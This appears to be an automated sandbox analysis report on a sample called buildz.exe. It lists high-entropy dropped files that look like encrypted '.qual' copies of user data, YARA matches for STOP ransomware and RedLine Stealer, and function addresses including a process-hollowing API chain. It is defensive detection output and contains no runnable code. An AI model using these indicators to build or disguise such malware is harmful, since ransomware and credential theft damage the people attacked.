          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\id\strings.json entropy: 7.99708035765Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr-CA\strings.json entropy: 7.99661253341Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\fr\strings.json entropy: 7.99733681085Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\es\strings.json entropy: 7.9965408022Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\en-GB\strings.json entropy: 7.99680996852Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\de\strings.json entropy: 7.99715529723Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hant\strings.json entropy: 7.99725850009Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\zh-Hans\strings.json entropy: 7.99631056394Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\sv\strings.json entropy: 7.99698270851Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet\116.16385.16360.19\json\i18n-hub\ru\strings.json entropy: 7.99791450449Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db entropy: 7.99446382136Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt entropy: 7.99776539633Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5959.0\edge_tracking_page_validator.js entropy: 7.99644879055Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Shopping\2.0.5975.0\edge_tracking_page_validator.js entropy: 7.99789961247Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Adobe\Acrobat\DC\UserCache64.bin.qual (copy) entropy: 7.99751788985Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Google\Chrome\User Data\first_party_sets.db.qual (copy) entropy: 7.99644317351Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\excel.exe.db.qual (copy) entropy: 7.99149572575Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officec2rclient.exe.db.qual (copy) entropy: 7.99283705511Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officeclicktorun.exe.db.qual (copy) entropy: 7.99250205303Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Office\OTele\officesetup.exe.db.qual (copy) entropy: 7.99193285394Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000012.db.qual (copy) entropy: 7.99809041632Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x0000000000000013.db.qual (copy) entropy: 7.99810659581Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000004.db.qual (copy) entropy: 7.99755635617Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000005.db.qual (copy) entropy: 7.99820020089Jump to dropped file
          Source: C:\Users\user\Desktop\buildz.exeFile created: C:\Users\user\Local Settings\Microsoft\Windows\Explorer\ExplorerStartupLog_RunOnce.etl.qual (copy) entropy: 7.99319081113Jump to dropped file

          System Summary

          barindex
          Source: 2.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 2.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 8.2.buildz.exe.22b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 8.2.buildz.exe.22b15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 4.2.buildz.exe.22815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 4.2.buildz.exe.22815a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 10.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 10.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.buildz.exe.23115a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.buildz.exe.23115a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 4.2.buildz.exe.22815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 4.2.buildz.exe.22815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.buildz.exe.23015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.buildz.exe.23015a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 8.2.buildz.exe.22b15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 8.2.buildz.exe.22b15a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 15.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 15.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 12.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 12.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 5.2.buildz.exe.23015a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 5.2.buildz.exe.23015a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 15.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 15.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0.2.buildz.exe.23115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0.2.buildz.exe.23115a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 11.2.buildz.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 11.2.buildz.exe.22615a0.1.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 10.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 10.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 2.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 2.2.buildz.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 6.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 6.2.buildz.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 11.2.buildz.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 11.2.buildz.exe.22615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000008.00000002.2313135610.0000000000933000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000005.00000002.2523332173.0000000000814000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000008.00000002.2313819573.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000F.00000002.3294437219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000002.00000002.2119606851.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 0000000B.00000002.2425231784.0000000000A2D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 00000005.00000002.2526448336.0000000002300000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000C.00000002.2435292672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000000.00000002.2097851839.0000000002310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000006.00000002.2948785389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000004.00000002.2189047910.0000000002280000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 00000004.00000002.2188854432.0000000000A42000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: 0000000A.00000002.2325833374.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects STOP ransomware Author: ditekSHen
          Source: 00000000.00000002.2097760576.0000000000A2C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
          Source: 0000000B.00000002.2426701504.0000000002260000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 5576, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 5272, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 5240, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 7120, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 432, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 940, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 6848, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 5700, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 2148, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: Process Memory Space: buildz.exe PID: 4708, type: MEMORYSTRMatched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02310110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,0_2_02310110
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_02280110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,4_2_02280110
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_02300110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,ExitProcess,5_2_02300110
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_00402C870_2_00402C87
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023172200_2_02317220
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023922C00_2_023922C0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0235E37C0_2_0235E37C
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023173930_2_02317393
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0232F0300_2_0232F030
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231A0260_2_0231A026
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231B0000_2_0231B000
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231B0B00_2_0231B0B0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023130F00_2_023130F0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023170E00_2_023170E0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023200D00_2_023200D0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023191200_2_02319120
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0235E1410_2_0235E141
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0233D1A40_2_0233D1A4
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231A6990_2_0231A699
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0235B69F0_2_0235B69F
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231E6E00_2_0231E6E0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231C7600_2_0231C760
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231A79A0_2_0231A79A
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0233D7F10_2_0233D7F1
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023135200_2_02313520
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023175200_2_02317520
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231CA100_2_0231CA10
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02317A800_2_02317A80
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02320B000_2_02320B00
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02312B600_2_02312B60
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231DBE00_2_0231DBE0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023178800_2_02317880
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023318D00_2_023318D0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0231A9160_2_0231A916
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0233F9B00_2_0233F9B0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_0233E9A30_2_0233E9A3
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023159F70_2_023159F7
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_023189D00_2_023189D0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02318E600_2_02318E60
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02344E9F0_2_02344E9F
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02352D1E0_2_02352D1E
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02315DF70_2_02315DF7
          Source: C:\Users\user\Desktop\buildz.exeCode function: 0_2_02315DE70_2_02315DE7
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040D2402_2_0040D240
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00419F902_2_00419F90
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040C0702_2_0040C070
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0042E0032_2_0042E003
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004080302_2_00408030
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004101602_2_00410160
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004021C02_2_004021C0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0044237E2_2_0044237E
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004084C02_2_004084C0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004344FF2_2_004344FF
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0043E5A32_2_0043E5A3
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040A6602_2_0040A660
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0041E6902_2_0041E690
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004067402_2_00406740
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004027502_2_00402750
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040A7102_2_0040A710
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004087802_2_00408780
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0042C8042_2_0042C804
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004068802_2_00406880
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004349F32_2_004349F3
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004069F32_2_004069F3
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00402B802_2_00402B80
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00406B802_2_00406B80
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0044ACFF2_2_0044ACFF
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0042CE512_2_0042CE51
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00434E0B2_2_00434E0B
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00406EE02_2_00406EE0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00420F302_2_00420F30
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004050572_2_00405057
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0042F0102_2_0042F010
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004070E02_2_004070E0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004391F62_2_004391F6
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004352402_2_00435240
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004C93432_2_004C9343
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004054472_2_00405447
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004054572_2_00405457
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004495062_2_00449506
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0044B5B12_2_0044B5B1
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004356752_2_00435675
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004096862_2_00409686
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040F7302_2_0040F730
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0044D7A12_2_0044D7A1
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_004819202_2_00481920
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0044D9DC2_2_0044D9DC
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00449A712_2_00449A71
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00443B402_2_00443B40
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00409CF92_2_00409CF9
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040DD402_2_0040DD40
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00427D6C2_2_00427D6C
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0040BDC02_2_0040BDC0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00409DFA2_2_00409DFA
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00409F762_2_00409F76
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_0046BFE02_2_0046BFE0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 2_2_00449FE32_2_00449FE3
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022872204_2_02287220
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_023022C04_2_023022C0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022CE37C4_2_022CE37C
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022873934_2_02287393
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228A0264_2_0228A026
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0229F0304_2_0229F030
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228B0004_2_0228B000
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228B0B04_2_0228B0B0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022870E04_2_022870E0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022830F04_2_022830F0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022900D04_2_022900D0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022891204_2_02289120
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022CE1414_2_022CE141
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022AD1A44_2_022AD1A4
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228A6994_2_0228A699
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022CB69F4_2_022CB69F
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228E6E04_2_0228E6E0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228C7604_2_0228C760
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228A79A4_2_0228A79A
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022AD7F14_2_022AD7F1
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022835204_2_02283520
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022875204_2_02287520
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228CA104_2_0228CA10
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_02287A804_2_02287A80
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_02290B004_2_02290B00
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_02282B604_2_02282B60
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228DBE04_2_0228DBE0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022878804_2_02287880
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022A18D04_2_022A18D0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_0228A9164_2_0228A916
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022AE9A34_2_022AE9A3
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022AF9B04_2_022AF9B0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022859F74_2_022859F7
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022889D04_2_022889D0
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_02288E604_2_02288E60
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022B4E9F4_2_022B4E9F
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_022C2D1E4_2_022C2D1E
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_02285DE74_2_02285DE7
          Source: C:\Users\user\Desktop\buildz.exeCode function: 4_2_02285DF74_2_02285DF7
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023072205_2_02307220
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023822C05_2_023822C0
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0234E37C5_2_0234E37C
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_023073935_2_02307393
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0231F0305_2_0231F030
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230A0265_2_0230A026
          Source: C:\Users\user\AppData\Local\c53bc5ed-81b6-49df-8a73-9bf24188ea08\buildz.exeCode function: 5_2_0230B0005_2_0230B000
